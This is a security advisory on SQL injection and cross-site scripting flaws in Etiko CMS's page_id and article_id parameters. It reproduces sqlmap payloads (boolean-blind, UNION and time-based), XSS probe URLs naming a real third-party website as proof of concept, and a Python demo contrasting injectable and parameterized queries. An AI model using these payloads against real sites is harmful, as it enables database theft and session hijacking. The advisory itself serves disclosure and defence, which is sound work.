Etiko CMS index.php Cross-Site Scripting Vulnerability
Affected Systems:
Etiko CMS
Etiko CMS is a content management system.
Etiko CMS does not validate the page_id and article_id parameters passed to index.php (and to /loja/index.php). A cross-site scripting vulnerability exists in the PHP script's input handling: a remote attacker can construct a URL that, when opened by a user, executes script in that user's web browser and steals cookie-based authentication credentials. The published test method below also shows the same two parameters to be SQL-injectable, so the issue is a combined CWE-79 / CWE-89 flaw rather than XSS alone.
<* Source: Felipe "Renzi" Gabriel
Link: http://xforce.iss.net/xforce/xfdb/97031
*>
Test method:
# SQL Injection & XSS on Etiko CMS.
# Risk: High
# CWE number: CWE-89, CWE-79
# Date: 13/10/2014
# Vendor: www.etikweb.com
# Version: All
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Windows 8; Chrome; Sqlmap 1.0-dev-nongit-20140906
# Vulnerable files: /index.php & /loja/index.php
# Exploits: http://www.target.com/loja/index.php?page_id=19 [XSS] & [SQLi]
http://www.target.com/index.php?article_id=16 [SQLi] & [XSS]
# PoC: http://www.centrovegetariano.org/loja/index.php?page_id=19
http://www.centrovegetariano.org/index.php?article_id=16
--- "SQLi using sqlmap" ---
---
Place: GET
Parameter: page_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page_id=19' AND 3987=3987 AND 'tulh'='tulh
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: page_id=-5362' UNION ALL SELECT NULL,NULL,CONCAT(0x7175616f71,0x467a784a6e62664d5a79,0x716b756271)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page_id=19' AND SLEEP(5) AND 'mnts'='mnts
---
---
Place: GET
Parameter: article_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=16' AND 8044=8044 AND 'ykze'='ykze
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: article_id=-2752' UNION ALL SELECT 60,60,60,60,60,60,CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=16' AND SLEEP(5) AND 'mdwy'='mdwy
---
--- "XSS using HTML injection" ---
http://www.centrovegetariano.org/loja/index.php?page_id=19"><marquee>XSS</marquee>
http://www.centrovegetariano.org/index.php?article_id=16"><marquee>XSS</marquee>
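As an added illustration (not code from the advisory, and not Etiko CMS source, which is not shown on this page), the following Python reproduces the mechanism behind the payloads above against an in-memory SQLite table and shows the parameterized query and attribute-context output encoding that stop both issues. The table name, columns, sample rows and the SQLite-flavored UNION payload are assumptions made for the demo; the boolean-based blind payload, the hex marker strings and the XSS probe are taken from the advisory as written.

```python
import html
import re
import sqlite3

# Constructed sample rows standing in for the CMS's article table; the real
# schema is not known from the advisory.
SAMPLE_ROWS = [(16, "Vegetarian recipes"), (19, "Shop front page")]

# Boolean-based blind payloads: the first is the advisory's own sqlmap output,
# the second differs only in the arithmetic comparison (assumed false branch).
BOOL_TRUE = "16' AND 8044=8044 AND 'ykze'='ykze"
BOOL_FALSE = "16' AND 8044=8045 AND 'ykze'='ykze"

# The advisory's UNION payload uses MySQL-only CONCAT() and '#'. This SQLite
# equivalent is an assumption for the demo: one selected column, '--' comment.
UNION_SQLITE = "-2752' UNION ALL SELECT 'qghvq'||sqlite_version()||'qrpzq'-- "

# The advisory's UNION payload, used only to decode its hex markers.
UNION_MYSQL = ("article_id=-2752' UNION ALL SELECT 60,60,60,60,60,60,"
               "CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60#")

# The advisory's reflected-XSS probe.
XSS_PROBE = '19"><marquee>XSS</marquee>'


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (article_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, article_id):
    """The pattern the advisory implies: the raw GET parameter is spliced into
    the SQL text, so a quote in it ends the literal and the rest is parsed as SQL."""
    sql = "SELECT title FROM articles WHERE article_id='%s'" % article_id
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, article_id):
    """Hardened form: the value is bound as a parameter and never parsed as SQL.
    An injection string simply matches no row."""
    sql = "SELECT title FROM articles WHERE article_id=?"
    return [row[0] for row in conn.execute(sql, (article_id,))]


def decode_sqlmap_markers(payload):
    """sqlmap wraps the value it extracts in hex string literals. Decoding them
    shows they are only q..q delimiters that sqlmap searches for in the response
    body; they are not data from the target."""
    return [bytes.fromhex(h).decode("ascii")
            for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


def vulnerable_render(param):
    """Reflection as the advisory describes it: the parameter lands inside an
    attribute value unencoded, so the leading '">' closes attribute and tag."""
    return '<input name="page_id" value="%s">' % param


def safe_render(param):
    """Attribute-context output encoding; the probe becomes inert text."""
    return '<input name="page_id" value="%s">' % html.escape(param, quote=True)


def demo():
    """Runs every case once and returns the results keyed by name."""
    conn = make_db()
    return {
        "bool_true": vulnerable_lookup(conn, BOOL_TRUE),    # row returned
        "bool_false": vulnerable_lookup(conn, BOOL_FALSE),  # no row: the oracle
        "union": vulnerable_lookup(conn, UNION_SQLITE),     # attacker-chosen data
        "safe_true": safe_lookup(conn, BOOL_TRUE),          # no row, no injection
        "safe_plain": safe_lookup(conn, "16"),              # normal use still works
        "markers": decode_sqlmap_markers(UNION_MYSQL),
        "xss_raw": vulnerable_render(XSS_PROBE),
        "xss_safe": safe_render(XSS_PROBE),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The boolean pair is the whole of a blind injection oracle: the true payload returns the article, the false one returns nothing, and sqlmap extracts data one bit at a time from that difference. The time-based payloads in the advisory work the same way with response latency instead of content, which is why a fix must remove the injection rather than filter one keyword.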
Vendor patch:
Etiko
-----
At the time of writing the vendor has not released a patch or upgrade. Users of the software should watch the vendor's homepage for a fixed version; until one is available, the code paths that read page_id and article_id should bind them as query parameters and HTML-encode them on output:
http://www.etikweb.com/